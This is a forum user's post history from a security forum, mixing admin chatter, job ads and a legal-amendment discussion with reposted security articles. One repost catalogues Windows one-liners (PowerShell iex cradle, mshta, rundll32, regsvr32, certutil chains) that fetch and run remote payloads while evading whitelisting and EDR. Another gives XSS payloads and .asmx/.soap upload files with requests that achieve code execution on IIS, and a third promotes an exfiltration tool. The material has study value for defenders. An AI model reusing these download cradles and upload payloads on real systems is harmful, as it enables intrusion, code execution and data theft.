
Nytro

Administrators
  • Posts: 18785
  • Days Won: 738

Everything posted by Nytro

  1. Yes, I had noticed it at some point, I'll remove it. I set it in Apache and IPBoard probably generates it as well.
  2. I updated the server. You now have HTTP 2.0 as well. Let me know if there are any problems.
  3. Bitcoin has started rising again.
  4. You can find an official description here: https://www.bestjobs.eu/ro/loc-de-munca/working-student-application-security-internship If you have questions, send me a private message.
  5. Hi, 1&1 is looking for people interested in web application security. They are looking both for penetration testing and for developing applications related to it. If anyone is interested, send me a private message and I can give you more details.
  6. I'll have a look to see if I can find the plugin.
  7. Stack Based Buffer Overflows on x86 (Windows) – Part I

      I wrote this article in Romanian, in 2014, and I decided to translate it, because it is a very detailed introduction to the exploitation of a “Stack Based Buffer Overflow” on x86 (32 bits) Windows.

      Introduction

      This tutorial is for beginners, but it requires at least some basic knowledge about C/C++ programming in order to understand the concepts. The system that we will use and exploit the vulnerability on is Windows XP (32 bits – x86) for simplicity reasons: there is no DEP and ASLR, things that will be detailed later.

      I would like to start with a short introduction on assembly (ASM) language. It will not be very detailed, but I will shortly describe the concepts required to understand what a “buffer overflow” vulnerability looks like, and how it can be exploited. There are multiple types of buffer overflows; here we will discuss only the easiest one to understand, the stack based buffer overflow.

      Source: https://nytrosecurity.com/2017/12/09/stack-based-buffer-overflows-on-x86-windows-part-i/
  8. Hi, I was looking today over the changes made by our "friends" at PSD-ALDE and I noticed something interesting. It concerns "Art. 223 Conditions and cases for applying the measure of pre-trial detention", paragraph 2.

      Original text: "The measure of pre-trial detention of the defendant may also be taken if the evidence gives rise to a reasonable suspicion that he has committed an intentional offence against life, an offence that caused bodily harm or the death of a person, an offence against national security provided for by the Criminal Code and other special laws, an offence of drug trafficking, of carrying out illegal operations with precursors or with other products likely to have psychoactive effects, an offence concerning non-compliance with the regime of weapons, ammunition, nuclear materials and explosive materials, trafficking and exploitation of vulnerable persons, acts of terrorism, money laundering, counterfeiting of currency, stamps or other valuables, blackmail, rape, unlawful deprivation of liberty, tax evasion, assault on an official, assault on a judicial official, a corruption offence, an offence committed through computer systems or electronic means of communication, or another offence for which the law provides a prison sentence of 5 years or more and, based on an assessment of the seriousness of the act, of the manner and circumstances in which it was committed, of the entourage and environment from which he comes, of his criminal record and of other circumstances concerning his person, it is found that depriving him of liberty is necessary to remove a state of danger to public order."

      Modified text: "The measure of pre-trial detention of the defendant may also be taken if the evidence gives rise to a reasonable suspicion that he has committed an intentional offence against life, an offence that caused bodily harm or the death of a person, an offence against national security provided for by the Criminal Code and other special laws, an offence of narcotics trafficking, arms trafficking, human trafficking, terrorism and offences concerning acts of terrorism, counterfeiting of currency or other valuables, blackmail, rape, deprivation of liberty, assault on an official, assault on a judicial official, or another offence committed with violence and, cumulatively, based on an assessment of the seriousness of the act, of the manner and circumstances in which it was committed, of the entourage and environment from which he comes, of his criminal record and of other circumstances concerning his person, it is found that depriving him of liberty is absolutely necessary to remove a state of concrete danger to public order."

      Here is a DIFF:

      As I expected, you can see that the following are missing:
      • money laundering
      • tax evasion
      • corruption offences

      But also "an offence committed through computer systems or electronic means of communication". In other words, in my opinion as a person with no expertise in the legal field, pre-trial detention will no longer apply to those offences.

      I posted this so that, in case you are accused of "offences committed through computer systems", you keep in mind that (if the law passes, and it probably will) you cannot be detained.

      You can find here a collection of PSD-branded amendments: http://media.hotnews.ro/media_server1/document-2017-12-14-22176865-0-transpunere-directiva-nevinovatie-13-dec.pdf
  9. Nytro

    Nytro Security

    I'm more worried about them: https://www.seagate.com/de/de/enterprise-storage/nytro-drives/
  10. Nytro

    Nytro Security

    I've had the username "Nytro" since around 2007-2008. I need to check when they chose their company name to know who has priority. Yes, what you say is true, I'll think of something else too, thanks!
  11. Nytro

    Nytro Security

    I've made myself a blog too. I won't write very often, just now and then... https://nytrosecurity.com/
  12. A guy, Slick, had made that program (Conquistador killer) and he was an admin here on the forum. That program can be made for other games of that kind too. If you bought it, you could also crack it and no longer care about its licence, right?
  13. Invest in eggs. Thank me later.
  14. Nytro

    Protonmail

    48$ a year? For that money I can get Yahoo! Premium/Pro, it costs the same. </joke>
  15. Nytro

    Black Friday

    At eMAG there are some discounts with the voucher "eMAG16ani". The discounts (on many products) are small, but real. Any product, 5% off. I had looked at the Huawei Mate 10 Pro, the discount is a real 170 RON. In certain categories there are discounts of 10%-20%-30%. Maybe it helps you.
  16. No idea. They could give a sign if they are still around.
  17. Why <blank> Gets You Root https://objective-see.com/blog/blog_0x24.html
  18. Do you have some 0day you don't want to tell us about? Batman can write kernel exploits too if he wants...
  19. Change the root password

      • Choose Apple menu () > System Preferences, then click Users & Groups (or Accounts).
      • Click , then enter an administrator name and password.
      • Click Login Options.
      • Click Join (or Edit).
      • Click Open Directory Utility.
      • Click in the Directory Utility window, then enter an administrator name and password.
      • From the menu bar in Directory Utility, choose Edit > Change Root Password…
      • Enter a root password when prompted.

      Via: https://support.apple.com/en-us/HT204012
  20. Another crappy one after the one with the password in place of the hint. Do they no longer have the budget for good developers?
  21. Syscall Monitor

      Introduction

      This is a process monitoring tool (like Sysinternal's Process Monitor) implemented with Intel VT-X/EPT for Windows 7+.

      Develop Environment

      • Visual Studio 2015 update 3
      • Windows SDK 10
      • Windows Driver Kit 10
      • QT5.7 for MSVC

      Deployment

      • QT GUI project: SyscallMonQT/SyscallMonQT.pro
      • Windows kernel driver project: ddimon/DdiMon/DdiMon.vcxproj
      • Remember to modify the shadow build path to /build32 or /build64 when configuring the QT project
      • Remember to modify the windeploy.exe path in deploy32/deploy64.bat, run deploy32/64.bat to deploy x86/x64 binary files to bin32/bin64
      • Remember to sign the x64 kernel driver file

      Platform

      • x86 and x64 Windows 7, 8.1 and 10
      • CPU with Intel VT-x and EPT technology support

      Reference & Thanks

      • BOOST http://www.boost.org/
      • QT https://www.qt.io/
      • HyperPlatform https://github.com/tandasat/HyperPlatform
      • Capstone http://www.capstone-engine.org/

      TODO

      1. Optimize the memory usage issue.

      Screenshots

      Source: https://github.com/hzqst/Syscall-Monitor
      • 1
      • Upvote
  22. Windows oneliners to download remote payload and execute arbitrary code

      20 November 2017, arno0x0x

      In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an attacker could use besides the famous powershell oneliner » ?

      These command lines need to fulfill the following prerequisites:

      • allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits huh ?
      • allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, does it ?
      • be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays ?
      • make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as many systems as possible
      • be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet ?
      • work in memory only – because your final payload might get caught by AV when written on disk

      A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want: execute arbitrary code abusing Microsoft built-in binaries.

      Let’s be clear that not all command lines will fulfill all of the above points. Especially the « do not write the payload on disk » one, because most of the time the downloaded file will end up in a local cache.

      When it comes to downloading a payload from a remote server, it basically boils down to 3 options:

      • either the command itself accepts an HTTP URL as one of its arguments
      • the command accepts a UNC path (pointing to a WebDAV server)
      • the command can execute a small inline script with a download cradle

      Depending on the version of Windows (7, 10), the local cache for objects downloaded over HTTP will be the IE local cache, in one of the following locations:

          C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
          C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>

      On the other hand, files accessed via a UNC path pointing to a WebDAV server will be saved in the WebDAV client local cache:

          C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

      When using a UNC path to point to the WebDAV server hosting the payload, keep in mind that it will only work if the WebClient service is started. In case it’s not started, in order to start it even from a low privileged user, simply prepend your command line with « pushd \\webdavserver & popd ».

      In all of the following scenarios, I’ll mention which process is seen as performing the network traffic and where the payload is written on disk.

      Powershell

      Ok, this is by far the most famous one, but also probably the most monitored one, if not blocked. A well known proxy friendly command line is the following:

          powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

      Process performing network call: powershell.exe
      Payload written on disk: NO (at least nowhere I could find using procmon !)

      Of course you could also use its encoded counterpart. But you can also call the payload directly from a WebDAV server:

          powershell -exec bypass -f \\webdavserver\folder\payload.ps1

      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Cmd

      Why make things complicated when you can have cmd.exe executing a batch file ? Especially when that batch file can not only execute a series of commands but also, more importantly, embed any file type (scripting, executable, anything that you can think of !). Have a look at my Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior work), and see that you can easily drop any binary, dll, script: https://github.com/Arno0x/PowerShellScripts

      So once you’ve been creative with your payload as a batch file, go for it:

          cmd.exe /k < \\webdavserver\folder\batchfile.txt

      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Cscript/Wscript

      Also very common, but the idea here is to download the payload from a remote server in one command line:

          cscript //E:jscript \\webdavserver\folder\payload.txt

      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Mshta

      Mshta really is the same family as cscript/wscript but with the added capability of executing an inline script which will download and execute a scriptlet as a payload:

          mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

      Process performing network call: mshta.exe
      Payload written on disk: IE local cache

      You could also do a much simpler trick since mshta accepts a URL as an argument to execute an HTA file:

          mshta http://webserver/payload.hta

      Process performing network call: mshta.exe
      Payload written on disk: IE local cache

      Eventually, the following also works, with the advantage of hiding mshta.exe downloading stuff:

          mshta \\webdavserver\folder\payload.hta

      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Rundll32

      A well known one as well, can be used in different ways. First one is referring to a standard DLL using a UNC path:

          rundll32 \\webdavserver\folder\payload.dll,entrypoint

      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Rundll32 can also be used to call some inline jscript:

          rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

      Process performing network call: rundll32.exe
      Payload written on disk: IE local cache

      Regasm/Regsvc

      Regasm and Regsvc are one of those fancy application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV:

          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Regsvr32

      Another one from @subTee. This one requires a slightly different scriptlet from the mshta one above. First option:

          regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

      Process performing network call: regsvr32.exe
      Payload written on disk: IE local cache

      Second option using UNC/WebDAV:

          regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Odbcconf

      This one is close to the regsvr32 one. Also discovered by @subTee, it can execute a DLL exposing a specific function. To be noted is that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:

          odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Msbuild

      Let’s keep going with all these .Net framework utilities discovered by @subTee. You can NOT use msbuild.exe using an inline task straight from a UNC path (actually, you can but it gets really messy), so I came up with the following trick, using msbuild.exe only. Note that it will require to be called within a shell with ENABLEDELAYEDEXPANSION (/V option):

          cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Not sure this one is really useful as is. As we’ll see later, we could use other means of downloading the file locally, and then execute it with msbuild.exe.

      Combining some commands

      After all, having the possibility to execute a command line (from DDE for instance) doesn’t mean you should restrict yourself to only one command. Commands can be chained to reach an objective. For instance, the whole payload download part can be done with certutil.exe, again thanks to @subTee for discovering this:

          certutil -urlcache -split -f http://webserver/payload payload

      Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload:

          certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

      You could simply deliver an executable:

          certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

      There are probably many other ways of achieving the same result, but these command lines do the job while fulfilling most of the prerequisites we set at the beginning of this post !

      One may wonder why I do not mention the usage of the bitsadmin utility as a means of downloading a payload. I’ve left this one aside on purpose simply because it’s not proxy aware.

      Payloads source examples

      All the command lines previously cited make use of specific payloads:

      • Various scriptlets (.sct), for mshta, rundll32 or regsvr32
      • HTML Application (.hta)
      • MSBuild inline tasks (.xml or .csproj)
      • DLL for InstallUtil or Regasm/Regsvc

      You can get examples of most payloads from the awesome atomic-red-team repo on Github: https://github.com/redcanaryco/atomic-red-team from @redcanaryco.

      You can also get all these payloads automatically generated thanks to the GreatSCT project on Github: https://github.com/GreatSCT/GreatSCT

      You can also find some other examples on my gist: https://gist.github.com/Arno0x

      Source: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
      • 1
      • Upvote
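For defenders, the "process performing network call" observations in the post above translate directly into a triage rule over process-creation logs. The following is an added example, not code from the original article or from this forum post: `analyze`, `Finding` and the `regsvcs` image name are assumptions of this sketch, and the sample command lines are constructed from the ones quoted in the post.

```python
import re
from typing import List, NamedTuple

# Binaries the article lists as download-and-execute launchers.
WATCHED = {"powershell", "cmd", "cscript", "wscript", "mshta", "rundll32",
           "regasm", "regsvcs", "regsvr32", "odbcconf", "msbuild",
           "certutil", "installutil"}

HTTP_RE = re.compile(r"https?://[^\s\"')}]+", re.IGNORECASE)
# UNC reference: two backslashes, host, one backslash, path.
UNC_RE = re.compile(r"(?<![\\\w])\\\\[\w.@-]+\\[^\s\"')}]+")


class Finding(NamedTuple):
    image: str            # launcher binary, lower-case, without .exe
    method: str           # "http" or "unc"
    remote: str           # URL or UNC path found on the command line
    network_process: str  # process expected to generate the traffic


def image_name(segment: str) -> str:
    """Return the executable name that starts a command segment."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', segment)
    if not m:
        return ""
    base = re.split(r"[\\/]", m.group(1) or m.group(2))[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def analyze(cmdline: str) -> List[Finding]:
    """Flag watched binaries that reference a remote HTTP or UNC location."""
    findings = []
    lead = image_name(cmdline)
    # Naive split on the cmd.exe '&' separator (a URL containing '&'
    # would be cut short; acceptable for triage).
    for segment in cmdline.split("&"):
        image = image_name(segment)
        if image not in WATCHED:
            image = lead  # e.g. '!MB!' expanded by the parent 'cmd /V'
        if image not in WATCHED:
            continue
        # UNC/WebDAV: per the article the traffic comes from svchost.exe.
        # A UNC path alone cannot tell SMB from WebDAV; correlate with
        # WebClient service activity before escalating.
        for m in UNC_RE.finditer(segment):
            findings.append(Finding(image, "unc", m.group(0), "svchost.exe"))
        # HTTP: in the cases the article lists, the binary itself connects.
        for m in HTTP_RE.finditer(segment):
            findings.append(Finding(image, "http", m.group(0), image + ".exe"))
    return findings


# Constructed sample log lines (taken from the command lines in the post).
SAMPLES = [
    r"mshta \\webdavserver\folder\payload.hta",
    r"regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll",
    r"certutil -verify cert.cer",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(line, "->", analyze(line) or "no finding")
```

Findings with method `unc` point the analyst at the WebDAV client cache named in the post, and `http` findings for mshta, rundll32 and regsvr32 at the IE local cache.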
  23. SG1

      BECAUSE REASONS

      SG1 is a wanna be swiss army knife for data encryption, exfiltration and covert communication. In its core sg1 aims to be as simple to use as nc while maintaining high modularity internally, being a framework for bizarre exfiltration, data manipulation and transfer methods.

      Have you ever thought to have your chats or data transfers tunneled through encrypted, private and self deleting pastebins? What about sending that stuff to some dns client -> dns server bridge? Then TLS maybe?

      WORK IN PROGRESS, DON'T JUDGE

      Installation

      Make sure you have at least go 1.8 in order to build sg1, then:

          go get github.com/miekg/dns
          go get github.com/evilsocket/sg1
          cd $GOPATH/src/github.com/evilsocket/sg1/
          make

      If you want to build for a different OS and / or architecture, you can instead do:

          GOOS=windows GOARCH=386 make

      After compilation, you will find the sg1 binary inside the build folder, you can start with taking a look at the help menu:

          ./build/sg1 -h

      Source: https://github.com/evilsocket/sg1
      • 1
      • Upvote
  24. Why BlackList < WhiteList

      22 Nov 2017

      Often, when you write the code which is responsible for file uploading, you check the extensions of the downloaded file using a “whitelist” (when you can upload only files with certain extensions) or a “blacklist” (when you can upload any files which are not included in the list).

      After @ldionmarcil’s post, I decided to understand how popular web servers interact with various types of extensions. Firstly, I was interested in which content-type is returned by the web server for different file types.

      Developers usually include only well-known and obvious extensions in the blacklist. In this article, I want to consider the less widespread file types.

      For the demonstration PoC, I used the following payloads:

      Basic XSS payload:

          <script>alert(1337)</script>

      XML-based XSS payload:

          <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script>

      Below I’ll show the results of this little research.

      IIS web server

      By default, IIS responds with the text/html content-type for the file types presented in the list below:

      Extensions with basic vector: .cer .hxt .htm

      Therefore, it is possible to paste the basic XSS vector in the uploaded file, and we will get an alert box in the browser after opening the document.

      The list below includes extensions for which IIS responds with a content-type which allows executing XSS via the XML-based vector.

      Extensions with XML-based vector: .dtd .mno .vml .xsl .xht .svg .xml .xsd .xsf .svgz .xslt .wsdl .xhtml

      By default, IIS also supports SSI, however the exec section is prohibited for security reasons.

      Extensions for SSI: .stm .shtm .shtml

      More detailed information about SSI is written in the post by @ldionmarcil.

      In addition: There are also two other interesting extensions (.asmx and .soap) that could lead to arbitrary code execution. It was discovered in collaboration with Yury Aleinov (@YuryAleinov).

      Asmx extension

      If you can upload a file with the .asmx extension, it can lead to arbitrary code execution. For example, we took a file with the following content:

          <%@ WebService Language="C#" Class="MyClass" %>
          using System.Web.Services;
          using System;
          using System.Diagnostics;

          [WebService(Namespace="")]
          public class MyClass : WebService
          {
              [WebMethod]
              public string Pwn_Function()
              {
                  Process.Start("calc.exe");
                  return "PWNED";
              }
          }

      Then we sent a POST request to the uploaded document:

          POST /1.asmx HTTP/1.1
          Host: localhost
          Content-Type: application/soap+xml; charset=utf-8
          Content-Length: 287

          <?xml version="1.0" encoding="utf-8"?>
          <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
            <soap12:Body>
              <Pwn_Function/>
            </soap12:Body>
          </soap12:Envelope>

      As the result, IIS executed “calc.exe”.

      Soap extension

      Contents of the uploaded file with the .soap extension:

          <%@ WebService Language="C#" Class="MyClass" %>
          using System.Web.Services;
          using System;

          public class MyClass : MarshalByRefObject
          {
              public MyClass()
              {
                  System.Diagnostics.Process.Start("calc.exe");
              }
          }

      SOAP request:

          POST /1.soap HTTP/1.1
          Host: localhost
          Content-Length: 283
          Content-Type: text/xml; charset=utf-8
          SOAPAction: "/"

          <?xml version="1.0" encoding="utf-8"?>
          <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
            <soap:Body>
              <MyFunction />
            </soap:Body>
          </soap:Envelope>

      Apache (httpd or Tomcat)

      Extensions with basic vector: .shtml .html.de or .html.xxx (xxx – any characters)*

      Extensions with XML-based vector: .rdf .xht .xml .xsl .svg .xhtml .svgz

      * if there are any characters after “.html.” in the extension, Apache will respond with the text/html content-type.

      In addition: Apache returns a response without a Content-type header for a large number of files with different extensions, which allows an XSS attack, because the browser often decides how to handle this page by itself. This article includes detailed information about this question. For example, files with the .xbl and .xml extension are processed similarly in Firefox (if there is no Content-Type header in the response), so there is the possibility of exploiting XSS using the XML-based vector in this browser.

      Nginx

      Extensions with basic vector: .htm

      Extensions with XML-based vector: .svg .xml .svgz

      Source: https://mike-n1.github.io/ExtensionsOverview
      • 1
      • Upvote
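The post's argument can be checked mechanically: every extension it lists passes a typical blacklist, while an allowlist rejects all of them, including the Apache ".html.xxx" multi-extension case. This is an added example, not code from the original article; `NAIVE_BLACKLIST`, `ALLOWLIST` and both function names are constructed for illustration, and the extension list is the one given in the post.

```python
import os
import secrets
from typing import Optional, Tuple

# Extensions the article reports as rendered or executed by IIS, Apache, Nginx.
ARTICLE_EXTS = [
    ".cer", ".hxt", ".htm",                              # IIS, text/html
    ".dtd", ".mno", ".vml", ".xsl", ".xht", ".svg", ".xml", ".xsd",
    ".xsf", ".svgz", ".xslt", ".wsdl", ".xhtml",         # IIS, XML vector
    ".stm", ".shtm", ".shtml",                           # IIS, SSI
    ".asmx", ".soap",                                    # IIS, code execution
    ".html.de", ".rdf",                                  # Apache
]

# Constructed example of the "well-known and obvious" blacklist the
# article describes developers writing.
NAIVE_BLACKLIST = {".php", ".asp", ".aspx", ".jsp", ".html", ".js", ".exe"}

# Constructed allowlist: each permitted extension maps to the one
# Content-Type the application will serve it with.
ALLOWLIST = {".png": "image/png", ".jpg": "image/jpeg",
             ".pdf": "application/pdf"}


def blacklist_accepts(filename: str) -> bool:
    """The weak check: reject only extensions somebody thought of."""
    ext = os.path.splitext(filename.lower())[1]
    return ext not in NAIVE_BLACKLIST


def allowlist_store(filename: str) -> Optional[Tuple[str, str]]:
    """Return (server-side name, Content-Type) or None if rejected.

    Exactly one dot is allowed, so 'x.html.png' is refused rather than
    left to the web server's multi-extension handling, and the stored
    name is random so nothing from the client-supplied name survives.
    """
    name = os.path.basename(filename.replace("\\", "/")).lower()
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        return None
    ext = "." + parts[1]
    content_type = ALLOWLIST.get(ext)
    if content_type is None:
        return None
    return secrets.token_hex(8) + ext, content_type


def compare() -> dict:
    """Count how many of the article's extensions each check lets through."""
    names = ["poc" + ext for ext in ARTICLE_EXTS]
    return {
        "blacklist_passed": sum(blacklist_accepts(n) for n in names),
        "allowlist_passed": sum(allowlist_store(n) is not None for n in names),
        "total": len(names),
    }


if __name__ == "__main__":
    print(compare())
```

Serving the stored file with the Content-Type returned here, rather than letting the server derive one from the extension, also covers the missing-header case the post describes for Apache.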
  25. VEHICLE

      Viewstate Hidden Event Enumerator! An advanced toolset for testing modern web application frameworks and rich internet applications.

      VEHICLE (formerly known as ria-scip) is a pentest platform with advanced testing features for modern web application frameworks (MWAF) and rich internet applications (RIA). It enables testers to affect various server control properties and enumerate & execute dormant events of invisible, visible, disabled and commented server web controls (currently supported for ASP.net and Mono). These features are implemented by abusing application mis-configurations and framework-specific programming flaws, and by manipulating proprietary input formats.

      The project is implemented as an extension to the OWASP Zed Attack Proxy (ZAP) project.

      Developed by Hacktics ASC

      Link: https://github.com/hacktics/vehicle